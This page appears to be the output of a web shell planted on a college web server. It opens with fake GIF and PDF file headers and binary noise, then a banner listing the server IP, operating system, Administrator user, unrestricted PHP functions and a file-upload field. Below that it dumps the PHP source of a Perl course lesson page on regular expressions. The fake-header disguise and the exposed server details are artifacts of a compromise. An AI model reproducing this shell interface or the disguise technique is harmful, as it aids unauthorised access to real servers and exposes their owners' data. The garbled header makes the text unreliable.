GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/_Archive/CST1615/ |
Upload File : |
<? // CST1615/Lesson07.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); include('Course/courseInfo.phpinc'); include('classInfo.phpinc'); $evaluationNumber = "7"; $evaluationType = "Lesson"; $evaluationTitle = "In the World of Regular Expressions"; //$evaluationNumber = ""; $evaluationType = "Lab"; $evaluationPoints = 46; //$evaluationTitle = ""; if (!isset($evaluationTitle) || $evaluationTitle == "") { $evaluationTitle = $evaluationTitle; } if (!isset($evaluationNumber) || $evaluationNumber == "") { $evaluationNumber = $evaluationNumber; } if (strlen($evaluationNumber) == 1) { $evaluationName = $evaluationType."0".$evaluationNumber; } else { $evaluationName = $evaluationType.$evaluationNumber; } if (strlen($evaluationNumber) == 1) { $evaluationName = $evaluationType."0".$evaluationNumber; } else { $evaluationName = $evaluationType.$evaluationNumber; } if ($evaluationTitle != '') $evaluationTitle = ': '.$evaluationTitle; $title = $evaluationType." ".$evaluationNumber.": ".$evaluationTitle; $title = $evaluationType." ".$evaluationNumber.": ".$evaluationTitle; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; $pageMenu = 'Course/courseMenu.phpinc'; $smallTitle = true; include('common/pageHeader.phpinc'); $sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title; include('common/sectionHeader.phpinc'); $userFullName = str_replace(" ","",$_SESSION['userFullName']); ?> <p> <fieldset><legend>Description</legend> Perl has many features that set it apart from other languages. Of all those features, one of the most important is its strong support for regular expressions. These allow fast, flexible, and reliable string handling. </fieldset> <fieldset class="pio"><legend>Personalized Instruction</legend> <ol start="1" class="pio"> <li>Create a folder called <b><?=$evaluationName?></b> in your <?=$courseNumber?> folder and keep all files modified or created for this <?=$evaluationType?> there.</li> <li>Read Chapter <?=$evaluationNumber?> <i><?=$evaluationTitle?></i> in <?=$textbook['Title1']?><?=$textbook['Edition1Edition']?>.</li> <li>Perform all <b>Exercises</b> at the end of Chapter <?=$evaluationNumber?>. <br> If the exercise asks you to write a Perl program then keep it in a file called <b><?=$evaluationNumber?>-<i>exercisenumber</i>.pl</b>. unless the exercise states the file name. <br> An example for Chapter 1 would be <?=$evaluationNumber?>-1.pl <br> If the exercise asks a question then save the answer in a file called <b><?=$evaluationNumber?>-<i>exercisenumber</i>.txt</b>. <br> Replace <b><i>exercisenumber</i></b> with the exercise number in file names above.</li> </li> </ol> </fieldset> <? /* <fieldset class="pio"><legend>Objectives</legend> <ol class="obj pio" start="3"> <!-- Introduction 3 --> </ol> </fieldset> */ ?> <fieldset><legend>Evaluations</legend> Submit exercises for evaluation. <ol type="1"> <li>Zip up the <b><?=$evaluationName?></b> folder into a file called <b style="white-space:nowrap"><?=$userFullName?>-<?=$courseNumber?>-<?=$evaluationName?>.zip</b>.</li> <li>Send an email to <b><a href="mailto:jim.martinson@ridgewater.edu?subject=<?=$courseNumber?> <?=$evaluationName?> Submission">jim.martinson@ridgewater.edu</a></b> with a subject of <span style="white-space:nowrap;"><b><?=$courseNumber?> <?=$evaluationName?> Submission</b></span> and attach your <b style="white-space:nowrap"><?=$userFullName?>-<?=$courseNumber?>-<?=$evaluationName?>.zip</b> file.</li> <li>If you are not using Ridgewater's email system then enter your name as the first line of the message.</li> </ol> </fieldset> <? require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>